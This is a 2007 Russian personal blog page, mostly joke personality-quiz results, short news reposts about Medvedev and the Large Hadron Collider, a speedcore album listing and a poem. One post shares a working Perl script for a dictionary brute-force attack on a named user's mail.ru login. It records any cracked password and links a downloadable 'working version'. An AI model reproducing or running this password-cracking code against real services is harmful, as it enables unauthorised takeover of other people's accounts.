-Подписка по e-mail

 

 -Поиск по дневнику

Поиск сообщений в ebaut

 -Сообщества

Читатель сообществ (Всего в списке: 4) axeeffect_ru Скромная_чувиха about_ICQ atelier_du_design

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 22.09.2007
Записей:
Комментариев:
Написано: 2687

Вшфкн





MOV ECX, IA32_DEBUGCTL RDMSR; OR EAX, 4000h WRMSR

Результат теста "Во сколько лет вы выйдете замуж?"

Понедельник, 17 Декабря 2007 г. 16:06 + в цитатник
Результат теста:Пройти этот тест
"Во сколько лет вы выйдете замуж?"

Никогда!

Жачем брак? Это просто штамп в паспорте! Можно встречаться или жить вместе. А с этими бумажками морок больше!!! Да и вообще, ставя подпись в ЗАГсе обрекаешь себя на вечно-грязные носки и немытую посуду. Однако поминте. Что к тяжелобольным у нас пускают только законных жен. Да и детей лучше рожать в баке, чтобы там не говорили...
Психологические и прикольные тесты LiveInternet.ru
о_О хм... не ожидал )))))

Результат теста "Узнай ВСЁ о своей ПРОШЛОЙ ЖИЗНИ! Но осторожнее..."

Понедельник, 17 Декабря 2007 г. 16:04 + в цитатник
Результат теста:Пройти этот тест
"Узнай ВСЁ о своей ПРОШЛОЙ ЖИЗНИ! Но осторожнее..."

Точность 60%

У тебя было 7 пришествий на Землю. За эти 7 пришествий ты успел побывать в шкуре чёрной кошки, грозного аллегатора, а так же ты трижды был девушкой, скорее русской крестьянкой. Но спешу обрадовать, тебя до сих пор помнят, как великого гладиатора в древнем Риме, и как исскусного писателя, уроки у которого брал сам Платон.! Впереди у тебя остаётся 9 пришествий.Держись, самое интересное ещё впереди.!
Психологические и прикольные тесты LiveInternet.ru

Результат теста "Кто ты в мире музыки?"

Понедельник, 17 Декабря 2007 г. 16:02 + в цитатник
Результат теста:Пройти этот тест
"Кто ты в мире музыки?"

Dave Gahan (Depeche Mode)

В твоем прошлом было практически ВСЕ. Ты прошел через многое, поэтому обладаешь огромным опытом. Ты мудр и рассудителен, спокоен и непоколебим, собран и дисциплинирован, абсолютно точно знаешь, чего стоит тот или иной человек и никогда не теряешься, тебя практически невозможно застать врасплох. Единственная твоя слабость - это близкие тебе люди, которым ты принадлежишь душой и телом. Ради них ты способен на все. Мешать тебе что-то сделать - все равно что стоять на пути скорого поезда. Несмотря на некоторую жесткость, ты очень чувствителен ко всем проявлениям любви. Ты дружелюбен, умеешь выбирать друзей, организован, хороший руководитель. Всегда знаешь, чего хочешь. Разговорам предпочитаешь дело и поэтому, как правило, многого добиваешься. Знаешь себе цену. Ты достоин восхищения, ведь мы-то с тобой знаем, чего тебе это стоило! ;-)
Психологические и прикольные тесты LiveInternet.ru

Результат теста "Каким психическим расстройством ты страдаешь?"

Понедельник, 17 Декабря 2007 г. 15:56 + в цитатник
Результат теста:Пройти этот тест
"Каким психическим расстройством ты страдаешь?"

Маниакально-депрессивный психоз. Уведите его!!! Уведите!!!!

Психологические и прикольные тесты LiveInternet.ru
ЁЁЁ =)

Результат теста "хорошо ли ты целуешься?"

Понедельник, 17 Декабря 2007 г. 15:53 + в цитатник
Результат теста:Пройти этот тест
"хорошо ли ты целуешься?"

Ужасно! Ты совсем не умеешь целоваться!

Тебе не стоит целоваться, от тебя отвернуться ещё больше! Ты конечно можешь попробывать, мож что то получиться.
Психологические и прикольные тесты LiveInternet.ru
Ну воот... Я неудачник :`(((

Результат теста "Какая субкультура Вам ближе?"

Понедельник, 17 Декабря 2007 г. 15:50 + в цитатник
Результат теста:Пройти этот тест
"Какая субкультура Вам ближе?"

Вы - гот, child of darkness.

Огромные подведенные тушью глаза на белом от пудры лице, торчащие во все стороны волосы цвета вороньего крыла и черная одежда... Обычный человек может называть их ненормальными, сектантами или даже сатанистами, но сами они выбрали для себя другое имя: ГОТЫ. Это не дикие племена, предки германцев. Это люди в черном. Они хотят всем показать, что чернота у них снаружи и внутри. Корни готической эстетики - в средневековье, в мрачных временах чумных эпидемий и кровавого разгула инквизиции. Именно оттуда современные готы позаимствовали таинственную бледность, черные одежды и непонятное для остальных поклонение перед смертью.
Психологические и прикольные тесты LiveInternet.ru

Результат теста "Какой ты национальности?"

Понедельник, 17 Декабря 2007 г. 15:46 + в цитатник
Результат теста:Пройти этот тест
"Какой ты национальности?"

Русский. Вы очень, иногда слишком, эмоциональны. Надеетесь на авось, все решения принимаете в последнюю очередь. Очень дружелюбны, но, увы, слишком прямолинейны.

Психологические и прикольные тесты LiveInternet.ru

Результат теста "Какая вы сволочь?"

Понедельник, 17 Декабря 2007 г. 15:44 + в цитатник
Результат теста:Пройти этот тест
"Какая вы сволочь?"

Ты - ПолуСволочь!Ты можешь быть с людьми и милым, но им лучше тебя не доставать.

Психологические и прикольные тесты LiveInternet.ru

Результат теста "Какое вы существо в мире фэнтези?"

Понедельник, 17 Декабря 2007 г. 15:41 + в цитатник
Результат теста:Пройти этот тест
"Какое вы существо в мире фэнтези?"

Вы - эльф.


Вы красивы собой, умны, возможно даже владеете магией, но в то же время горделивы, самоуверенны, и даже самодовольны.
Психологические и прикольные тесты LiveInternet.ru

Результат теста ":: Ваш "психологический" возраст ::"

Понедельник, 17 Декабря 2007 г. 15:36 + в цитатник

Дмитрий Медведев стал преемником Путина

Понедельник, 10 Декабря 2007 г. 21:48 + в цитатник
Это цитата сообщения Любер [Прочитать целиком + В свой цитатник или сообщество!]

Дмитрий Медведев стал преемником Путина

Сегодня, 10 декабря, президент России Владимир Путин поддержал кандидатуру первого вице-премьера Дмитрия Медведева на пост президента страны, которого выдвинули сразу несколько партий - "Единая Россия", "Справедливая Россия", Аграрная партия и "Гражданская сила". "Что касается кандидатуры Дмитрия Анатольевича Медведева, я знаком с ним очень близко более 17 лет, и целиком и полностью поддерживаю эту кандидатуру", - отметил российский президент.

абалдеть... медвед будет нами править? нееее, я так не играю... фу =(

Метки:  

Аудио-запись: komprex_-_refuse_bad_speedcore

Вторник, 20 Ноября 2007 г. 19:59 + в цитатник
Прослушать Остановить
601 слушали
1 копий

[+ в свой плеер]

)

Метки:  

- новая серия фотографий в фотоальбоме

Вторник, 20 Ноября 2007 г. 19:34 + в цитатник

В Большом адронном коллайдере завершена установка сверхпроводящих магнитов

Суббота, 22 Сентября 2007 г. 22:29 + в цитатник
В ходе сооружения Большого адронного коллайдера (БАК) на границе Швейцарии и Франции завершен ключевой этап строительных работ – монтаж сверхпроводящих магнитов ускорителя элементарных частиц, передает AFP.

Коллайдер строится в туннеле с периметром 26650 метров на глубине около ста метров. Первые тестовые столкновения в коллайдере планировалось провести в ноябре 2007 года, однако происшедшая около месяца назад в ходе испытательных работ поломка одного из магнитов, возможно, приведет к некоторой задержке в графике ввода установки в строй.

В Большом адронном коллайдере будут разгоняться и сталкиваться протоны, а также ядра свинца. Устройство предназначено для поиска и изучения элементарных частиц. В частности, в коллайдере должен быть обнаружен так называемый бозон Хиггса, что станет доказательством правильности нынешних научных представлений об устройстве микромира.

После запуска БАК будет самым мощным ускорителем элементарных частиц в мире, почти на порядок превосходя своих ближайших конкурентов. Сооружение научного комплекса Большого адронного коллайдера ведется более 15 лет. В этой работе участвуют более 10 тысяч человек из 500 научных центров всего мира. До 10 процентов привлеченных к проекту сотрудников имеют российское происхождение, ряд заказов создатели БАК размещены на отечественных предприятиях.

Научный прогресс - вперед!!!

Простейший брутфорс )

Суббота, 22 Сентября 2007 г. 15:13 + в цитатник
Решил поделиться полезным кодом ) Пишем на Perl

#!/usr/bin/perl
use IO::Socket; ## Юзаем сокеты
$|++; ## Инкременируем буферайз
$server="www.mail.ru"; ## Задаем сервер
$port="80"; ## А также порт :)
$logfile="cracked.log"; ## Сюда пишем взломанный аккаунт
$words="bigdict.txt"; ## Наш большой словарик, по которому ведется брутфорс
$user="fuck"; ## Юзер, которого ломаем
$dir="/login.bml"; ## Скрипт, который возвращает статус
open(file, "$words") or die print "$!\n";
@data=;
$total=@data;
close file; ## Откроем словарь, запишем все слова в массив
foreach $pass (@data) { ## Цикл по каждому слову
$i++;
chomp($pass);
$socket=IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $port,
Proto => tcp)
or die print "Unable to connect to $server:$port\n"; ## Создаем соединение с mail.ru
$socket->autoflush(1); ## Отрубаем буферизацию (на всякий случай, т.к. по дефолту она вырублена)
$post="user=$user&password=$pass&"; ## Формируем POST-запрос
$len=length($post);
$len+=1; ## Находим длину запроса (фраза + \r\n)
print $socket "POST $dir HTTP/1.1\r\n";
print $socket "Host: www.mail.ru\r\n";;
print $socket "Content-Type: application/x-www-form-urlencoded\r\n";
print $socket "Connection: Close\r\n";
print $socket "Content-Length: $len\r\n";
print $socket "\r\n$post\r\n";

## Отправим в сокет длинный header

$socket->recv($answer,1024); ## И прочитаем возврат = 1 кб данных

if ($answer=~/\:$user\:/) {
open(logf, ">>$logfile") or die print "$!\n";
print logf "$user:$pass is OK!!!\n";
close logf;
print "$user:$pass is OK!!!\n";
exit 0; ## Если он содержит строку вида :user: - пишем лог и завершаем брут.
} ## Иначе, проверяем следующий пароль
}

Комменты приветствуются... Скачать рабочую версию можно http://kamensk.net.ru/forb/1/x/brut-lj.tar.gz

Метки:  

VA_-_Masters_of_Speedcore-CD-2006-SQ

Суббота, 22 Сентября 2007 г. 15:00 + в цитатник

Ripdate ...... : Dec-18-2006
Artist ....... : VA
Title ........ : Masters of Speedcore
Label ........ : Thorntree / ZYX Music
Catalog ...... : THORN05
Genre ........ : Hardcore
Type ......... : Sampler
Source ....... : CDDA
Encoder ...... : Lame 3.90.3 VBR + APS
Quality ...... : VBR/44.1kHz/Joint-Stereo
Tracks ....... : 22
Length ....... : 71:23 min
Filesize ..... : 93,3 MB

01 Frazzbass - Penis Is Evil 04:14
02 Frazzbass - Cocaine Driller Fucker 04:14
03 Frazzbass - Speak English Motherfucker 04:37
04 Frazzbass - Fuck On Mushrooms 05:21
05 Frazzbass - Throwin Them Bones 04:12
06 Komprex - Following Da Fashion 03:14
07 Frazzbass - Torture 03:49
08 Frazzbass - No 02:53
09 Kompex - Urban Skeleton 02:24
10 Frazzbass & Komprex - Cum With Your Pain 02:38
11 Komprex & Frazzbass - Resurrection 02:35
12 Komprex - Muori! 02:44
13 Komprex - Jump Yourself 02:39
14 Frazzbass & Komprex - Spaghetti Cunts 02:59
15 Komprex - Enigma 03:12
16 Frazzbass & Komprex - Deadly Pale Terrorism 03:52
17 Komprex - Mondo Brutale 02:55
18 Frazzbass & Komprex - Not Afraid Of You 02:17
19 Komprex & Frazzbass - I Don`t Give A Shit 02:48
20 Komprex - Il Piacere Della Sofferenza 03:19
21 Komprex - Fuck The Female Race 02:23
22 Komprex - Refuse Bad Speedcore 02:04

Скачать: http://rarecore.ifolder.ru/3205698

Приятного прослушивания... Очень редкий и классный альбом )

Метки:  

Очень грустный стих...

Суббота, 22 Сентября 2007 г. 13:40 + в цитатник
Отдать тебе любовь?
Отдай..
Она в грязи..
Отдай в грязи..
Я погадать хочу...
Гадай..
Еще хочу спросить..
Спроси..
Допустим, постучусь..
Впущу..
Допустим, позову..
Пойду..
А если там беда?
В беду..
А если обману?
Прощу..
"Спой!" - прикажу тебе?
Спою..
Запри для друга дверь..
Запру..
Скажу тебе - убей!
Убью..
Скажу тебе - умри!
Умру..
А если захлебнусь?
Спасу..
А если будет боль?
Стерплю..
А вдруг стена?
Снесу..
А если узел?
Разрублю..
А если сто узлов?
И сто..
Любовь тебе отдать?
Любовь..
Не будет этого!
За что?
За то, что не люблю рабов..

Метки:  

1

Суббота, 22 Сентября 2007 г. 13:39 + в цитатник
Первый пост )
Надо за это выпить! )))

- новая серия фотографий в фотоальбоме

Суббота, 22 Сентября 2007 г. 12:47 + в цитатник
Фотографии Surrendra :

Мои фотки )



Дневник Surrendra

Суббота, 22 Сентября 2007 г. 12:39 + в цитатник
М... Мой первый блог )
 (700x560, 47Kb)


Поиск сообщений в ebaut
Страницы: 6 5 4 3 2 [1] Календарь